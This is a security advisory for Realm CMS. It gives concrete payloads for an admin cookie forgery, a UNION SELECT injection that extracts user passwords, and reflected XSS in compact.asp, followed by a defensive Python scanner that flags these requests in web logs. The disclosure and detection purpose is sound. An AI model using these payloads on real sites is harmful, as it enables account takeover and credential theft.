# Original Advisory: http://bugreport.ir/index.php?/40

1. Exploits:
    1.1. An attacker can gain access to the admin pages by using a manipulated cookie.
        -------------
        -Set these cookies:
            RealmCmsUser=cUserfiles=userFiles&cIntallType=BugReportTeam&cDbLocat=in&cSiteName=www.Bugreport.IR&cFolder=%2Fcms&cUniqueID=db&cUserRole=1&cUserName=Admin&cUserID=20
        -Then go to:
            /_RealmAdmin/login.asp
        -------------
    1.2. SQL injection in the "KeyWordsList" function of "inc_routines.asp" via the "kwrd" parameter.
        -------------
        http://[URL]/cmsr/?job=kwl&kwrd=WWW.BugReport.IR' union select name,password from tblusers where name not like '%WWW.BugReport.IR
        -------------
    1.3. Reflected XSS and DB path disclosure in "/cms/_db/compact.asp".
        -------------
        http://[URL]/cms/_db/compact.asp?CmpctedDB=%3Cscript%3Ealert('XSSed by BugReport.IR')%3C/script%3E    (Reflected XSS attack)
        http://[URL]/cms/_db/compact.asp?CmpctedDB=1&Boyut=%3Cscript%3Ealert('XSSed by BugReport.IR')%3C/script%3E    (Reflected XSS attack)
        http://[URL]/cms/_db/compact.asp    (DB path disclosure)
        -------------
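
For defenders reviewing web server logs, the following added example (not part of the original advisory and not Realm CMS code) flags request targets that match items 1.2 and 1.3 above. The sample requests are constructed, the function names are hypothetical, and the patterns are heuristics chosen for this illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample request targets (path + query as a web server logs them).
SAMPLE_REQUESTS = [
    "/cmsr/?job=kwl&kwrd=security",
    "/cmsr/?job=kwl&kwrd=x'%20union%20select%20name,password%20from%20tblusers--",
    "/cms/_db/compact.asp?CmpctedDB=%3Cscript%3Ealert(1)%3C/script%3E",
    "/cms/_db/compact.asp?CmpctedDB=1&Boyut=%3Cb%3E",
    "/cms/_db/compact.asp",
    "/cms/default.asp?id=3",
]

# A quote followed by SQL syntax, or a UNION ... SELECT anywhere in the value.
SQLI = re.compile(r"'\s*(union|or|and|;|--)|\bunion\b.*\bselect\b", re.I)
MARKUP = re.compile(r"[<>]")  # angle brackets are not expected in these parameters

def classify(target):
    """Return the advisory items (1.2 / 1.3) that a request target matches."""
    parts = urlsplit(target)
    path = parts.path.lower()
    # parse_qs percent-decodes values; names are lower-cased because Classic ASP
    # looks up query-string parameter names case-insensitively.
    params = {k.lower(): v for k, v in
              parse_qs(parts.query, keep_blank_values=True).items()}
    hits = []
    if params.get("job", [""])[0].lower() == "kwl":
        if any(SQLI.search(v) for v in params.get("kwrd", [])):
            hits.append("1.2 SQL syntax in kwrd")
    if path.endswith("/_db/compact.asp"):
        reflected = params.get("cmpcteddb", []) + params.get("boyut", [])
        if any(MARKUP.search(v) for v in reflected):
            hits.append("1.3 markup in CmpctedDB/Boyut")
        else:
            # Any direct hit on the maintenance script is worth reviewing.
            hits.append("1.3 direct request to compact.asp")
    return hits

def scan(targets):
    """Return (target, hits) pairs for every request that matched something."""
    return [(t, h) for t in targets if (h := classify(t))]

if __name__ == "__main__":
    for target, hits in scan(SAMPLE_REQUESTS):
        print(", ".join(hits), "<-", target)
```

Item 1.1 is not covered here because a forged cookie cannot be told apart from a legitimate one by the request target alone.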